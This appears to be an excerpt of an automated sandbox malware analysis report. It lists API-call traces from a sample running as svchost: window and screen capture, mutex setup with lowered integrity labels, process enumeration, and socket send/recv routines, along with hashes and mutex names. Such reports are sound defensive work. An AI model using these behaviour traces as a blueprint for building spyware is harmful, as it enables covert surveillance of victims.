                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8F67
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F6F
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteDC.GDI32(?), ref: 02BB8F78
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: GetDC.USER32(00000000), ref: 02BB8F7C
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F8B
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F93
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FB4
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8FC3
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FDE
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8FFD
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: ReleaseDC.USER32(00000000,00000000), ref: 02BB900C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02BB937C
                                                                                                                                                                                                                • GetTopWindow.USER32(00000000), ref: 02BB938B
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB939E
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BB93B4
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BB93B7
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,00000000), ref: 02BB93C6
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02BB93CF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 02BB93DB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4064958368-0
                                                                                                                                                                                                                • Opcode ID: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                                • Instruction ID: ef8b85a6af4b34403e0eae7e694e3c698f7b79f1021d6453180773febc04cb90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5115E75980205ABCA60AB79ECCCE6B37ACAB447907008E04B312872D5DAB4FC10CF60
                                                                                                                                                                                                                Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,7735E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,7735E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2629017576-0
                                                                                                                                                                                                                • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                                • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                                Function 02BB8820 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90synchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GdiFlush.GDI32(00000000,?,00000000), ref: 02BB88B6
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB88C4
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,?), ref: 02BB88DA
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000000,?), ref: 02BB88E6
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?), ref: 02BB88F3
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB8915
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 3485819771-465009422
                                                                                                                                                                                                                • Opcode ID: c8a9c4738d92e97b8ab842a2833263fe036c2740f70751d942ee49cc91445c56
                                                                                                                                                                                                                • Instruction ID: 025b83dc8ec62b252a8dd7d47ffe644a09144d5d360d739ad2234437003c65b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8a9c4738d92e97b8ab842a2833263fe036c2740f70751d942ee49cc91445c56
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31C935E401049FCF11CF69D984AFA7BBEEF88794B1485A9EA44DB345D770E811CB90
                                                                                                                                                                                                                Function 02BBBAA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBBAAF
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBBAD4
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBBAE2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32 ref: 02BBBB17
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBBB1E
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBBB2E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 1675675969-465009422
                                                                                                                                                                                                                • Opcode ID: 68d0da7ad59ad818ef8cf61064f3d28e91baabc622ec85d77a47d13579a7b37f
                                                                                                                                                                                                                • Instruction ID: 5a711949704ea66b8b8a19a7ef3818136c67d139eca0be969fcca451e9fb4231
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68d0da7ad59ad818ef8cf61064f3d28e91baabc622ec85d77a47d13579a7b37f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C01F532A411109BD7759F28FC0CFF533A0EF447A9F454AA5EA059B295C3B19852CFA0
                                                                                                                                                                                                                Function 02BD1930 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 34synchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD193E
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 02BD195B
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD1962
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD1974
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1985
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                                • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 1370207991-1214925433
                                                                                                                                                                                                                • Opcode ID: 9b7c79f8e5dcc307f1457324384c510286df9dd18dd6f015ac72bba82d31ff63
                                                                                                                                                                                                                • Instruction ID: f3ef4ae27ef25e503a5ff0a24e55c1e5b7e2917cea2d26b22a73af9df9b1d24b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b7c79f8e5dcc307f1457324384c510286df9dd18dd6f015ac72bba82d31ff63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0F0E97099621477E3705BA99C09B9F7BACDF04B85F440694FB09A7180E7A4461147E1
                                                                                                                                                                                                                Function 02BCB980 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 33synchronizationsleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02BCB98E
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 02BCB9AB
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCB9B2
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB9C4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCB9D5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                                • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Wu
                                                                                                                                                                                                                • API String ID: 1370207991-3712121269
                                                                                                                                                                                                                • Opcode ID: a433ee4b08fe0ed0b067f4d11d6d1cc530babb3f726d9f515d2f6f0ca5c2d07d
                                                                                                                                                                                                                • Instruction ID: 411c9387f95723521db05a81b3024383851d673268e7b3ca2fef773afded24dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a433ee4b08fe0ed0b067f4d11d6d1cc530babb3f726d9f515d2f6f0ca5c2d07d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0F08230992614B7E6705BAA9D0AB9E7B5CDF02B99F500586FB05A71C09BF0561087E1
                                                                                                                                                                                                                Function 02BC9A00 Relevance: 12.1, APIs: 8, Instructions: 98networkstringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • send.WS2_32(?,02BF9E44,00000002,00000000), ref: 02BC9A2A
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9A4E
                                                                                                                                                                                                                • recv.WS2_32(?,00000001,?,00000000), ref: 02BC9A7C
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9AA0
                                                                                                                                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 02BC9AC5
                                                                                                                                                                                                                • lstrcmpA.KERNEL32(02BFFCA8,00000001,?,00000000), ref: 02BC9AED
                                                                                                                                                                                                                • lstrcmpA.KERNEL32(02BFFBA0,?,?,00000000), ref: 02BC9AFF
                                                                                                                                                                                                                • send.WS2_32(?,02BF9E48,00000002,00000000), ref: 02BC9B0E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: recv$lstrcmpsend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1090895577-0
                                                                                                                                                                                                                • Opcode ID: 1161220944b3bc6f35c065c570529cf477afc2d7e7bad474c683c61b2c0db2db
                                                                                                                                                                                                                • Instruction ID: 4c6184e537029339c54367f6f1a66f9885a59fa3fa3ceffc68d95c872a7c63e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1161220944b3bc6f35c065c570529cf477afc2d7e7bad474c683c61b2c0db2db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54317D71A4475D39FB2196644C41FFFB76C9B85700F1042C5F74497182D3B15A4A8BA0
                                                                                                                                                                                                                Function 02BBCA90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindowVisible.USER32(02BBD21D), ref: 02BBCAAF
                                                                                                                                                                                                                • GetWindowInfo.USER32(02BBD21D,?), ref: 02BBCAC9
                                                                                                                                                                                                                • GetClassLongA.USER32(02BBD21D,000000E6), ref: 02BBCB1E
                                                                                                                                                                                                                • PrintWindow.USER32(02BBD21D,?,00000000), ref: 02BBCB37
                                                                                                                                                                                                                • BitBlt.GDI32(02BBCD02,?,?,?,?,76C1BCB0,00000000,00000000,00CC0020), ref: 02BBCBDE
                                                                                                                                                                                                                  • Part of subcall function 02BBDCE0: GetClassNameA.USER32(?,?,00000101), ref: 02BBDCF6
                                                                                                                                                                                                                  • Part of subcall function 02BBC8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 02BBC8F8
                                                                                                                                                                                                                  • Part of subcall function 02BBC8D0: GdiFlush.GDI32(00000000,?,02BBC9F1,00000000,?), ref: 02BBC90E
                                                                                                                                                                                                                  • Part of subcall function 02BBC8D0: BitBlt.GDI32(02BBC9F1,00000000,00000000,?,02BBC9F1,?,00000000,00000000,00CC0020), ref: 02BBC934
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 2334662925-4251816714
                                                                                                                                                                                                                • Opcode ID: a7c8c29dce4c9cf03e25e1677f4eae2ef7a6c31e9cdc45d25ac699b5dc9156fc
                                                                                                                                                                                                                • Instruction ID: db58c8c76d02ac0d3a73afb1a695c5b745e578af8de367ce0ebe5a4d7ef6bbc4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7c8c29dce4c9cf03e25e1677f4eae2ef7a6c31e9cdc45d25ac699b5dc9156fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49414B71E00519AFCB29CF98C884AFEFBBAFF44354F55859AE405E3640DBB0A951CB90
                                                                                                                                                                                                                Function 02BBBB50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBB8F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBBB
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBE2
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02BBBC11
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BBBC27
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                                • String ID: 9e93884aa
                                                                                                                                                                                                                • API String ID: 410342393-2189048855
                                                                                                                                                                                                                • Opcode ID: 5868db8f9e9c25e2658847fe7c1233b7b7c21dfd1d385b52e10c793a36452b77
                                                                                                                                                                                                                • Instruction ID: 6f6542b5f4a3f5f1b5f3fb12c1d02fc80a48ba2dd7e692181701aeb792ef5cbd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5868db8f9e9c25e2658847fe7c1233b7b7c21dfd1d385b52e10c793a36452b77
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C31C9B1E4020DAFDB50DFA9D885AEEBBF4FB48705F50806AE508E7240E7745A55CF90
                                                                                                                                                                                                                Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,7702DB30), ref: 004015CF
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                                • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                                Function 02BD4BF0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD4C14
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD4C1F
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02BD4C45
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 02BD4C60
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 02BD4C6C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4C88
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4C9A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                • Opcode ID: c8349ffdd4e305f979a89ef18505f57c8737e0ed6bd463d4184c54319542220e
                                                                                                                                                                                                                • Instruction ID: 4acfb65dcbae271952f9cc4bb3996e69e567d72a237f8d1e37ccab7070891e4d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8349ffdd4e305f979a89ef18505f57c8737e0ed6bd463d4184c54319542220e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A211A572A053105BD320DF65EC49ADBBBACEB853A4F448A59FE5483180E7309519CBF6
                                                                                                                                                                                                                Function 02BE12F0 Relevance: 10.6, APIs: 7, Instructions: 67networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BE1314
                                                                                                                                                                                                                • inet_addr.WS2_32(?), ref: 02BE131F
                                                                                                                                                                                                                • htonl.WS2_32(000000FF), ref: 02BE132A
                                                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 02BE1336
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02BE1350
                                                                                                                                                                                                                • connect.WS2_32(00000000,?,00000010), ref: 02BE1363
                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 02BE136E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 298246419-0
